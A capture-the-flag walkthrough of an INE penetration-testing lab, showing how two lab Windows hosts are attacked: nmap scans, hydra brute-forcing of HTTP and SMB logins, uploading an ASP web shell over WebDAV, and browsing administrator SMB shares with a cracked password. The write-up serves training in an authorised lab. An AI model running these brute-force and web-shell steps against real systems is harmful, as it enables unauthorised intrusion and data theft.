Host & Network Penetration Testing: System-Host Based Attacks CTF 1

In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.

Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.

Useful files:

/usr/share/metasploit-framework/data/wordlists/common_users.txt, 
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp

Flags to Capture:

Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)
Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)
Flag 3: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local)
Flag 4: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)

Scanning 1st Machine

┌──(root㉿INE)-[~]
└─# nmap -sC -sV -script vuln target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-11 18:51 IST
Nmap scan report for target1.ine.local (10.5.25.223)
Host is up (0.0017s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.84 seconds

Let us browse the website and we have some kind of login credentials

Bruteforce HTTP

let us bruteforce the credentials as we do have a hint to do that.

hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /

Now, we can perform a brute-force attack to gather more details about our target system. The command to use is: dirb http://target1.ine.local -u bob:password_123321

Exploiting Webdav

After completing the directory fuzzing, we discovered that /webdav is running on the host.

Let’s navigate to that directory, and we found our first flag there which is:

From the flag above, we can clearly see that there is a file named test.asp, which indicates that the server accepts .asp file extensions for upload. We can also enumerate this through davtest. davtest is a command used to enumerate the file extensions that can be uploaded to WebDAV.

davtest -auth bob:password_123321 -url http://target1.ine.local/webdav

Having determined that we can upload various file types such as .asp, .txt, .shtml, and .html to the server, we will upload the .asp file to gain access to the shell.

To achieve this, we can use the cadaver tool to upload the file. The command will be

cadaver http://target1.ine.local/webdav

We will then upload the .asp file using the following command:

put /usr/share/webshells/asp/webshell.asp

We will then open the browser and navigate to /webdav/webshell.asp

As observed, we now have access to our shell. According to the question, valuable files are located on the C drive. Let’s list the contents of the C drive using the following command: dir C:\

And here, we have obtained our second flag. To read the contents of flag2.txt, use the following command:

type C:\flag2.txt

Scanning 2nd Machine

┌──(root㉿INE)-[~]
└─# nmap -sC -sV target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-11 19:14 IST
Nmap scan report for target2.ine.local (10.5.24.93)
Host is up (0.0018s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Datacenter 17763 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-3SC2DRK
| Not valid before: 2025-12-10T13:18:33
|_Not valid after:  2026-06-11T13:18:33
| rdp-ntlm-info: 
|   Target_Name: EC2AMAZ-3SC2DRK
|   NetBIOS_Domain_Name: EC2AMAZ-3SC2DRK
|   NetBIOS_Computer_Name: EC2AMAZ-3SC2DRK
|   DNS_Domain_Name: EC2AMAZ-3SC2DRK
|   DNS_Computer_Name: EC2AMAZ-3SC2DRK
|   Product_Version: 10.0.17763
|_  System_Time: 2025-12-11T13:45:03+00:00
|_ssl-date: 2025-12-11T13:45:12+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-12-11T13:45:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows Server 2019 Datacenter 17763 (Windows Server 2019 Datacenter 6.3)
|   Computer name: EC2AMAZ-3SC2DRK
|   NetBIOS computer name: EC2AMAZ-3SC2DRK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-12-11T13:45:08+00:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 2s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.73 seconds

Enumerating SMB

Let us enumerate SMB first

enum4linux -a target2.ine.local

However, we couldn’t find anything using enum4linux, as the server doesn’t allow it.

Since we don’t know the username and password, we need to enumerate both. While we can also use the Metasploit framework for this, I’m opting for the hydra tool for faster output.

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local

After performing the brute-force attack, we discovered various usernames and passwords. Let’s proceed with the administrator credentials.

To connect to the SMB share for the administrator user, use the following command:

smbclient -L //target2.ine.local -U administrator

You will be prompted for the password. Enter the administrator password.

The administrator has 6 shares. Before accessing any of the shares, let’s check the permissions of each one. To do this, we’ll use the crackmapexec tool.

crackmapexec smb target2.ine.local -u administrator -p pineapple --shares

After running the command, we discover that only two shares have read and write permissions: ADMIN$ and C$ .

Since C$ is the default share, let’s explore the contents of the C$ share. The command will be:

smbclient //target2.ine.local/C$ -U administrator

Finally, for the last flag, the question mentions that we need to enumerate the Desktop directory. Let’s navigate to that directory using the following command:cd Users\Administrator\Desktop\

After that, run the dir command to list all the contents.

Here, we find our last flag.

PreviousINE NextHost & Network Penetration Testing: System-Host Based Attacks CTF 2 - INE

Last updated 18 hours ago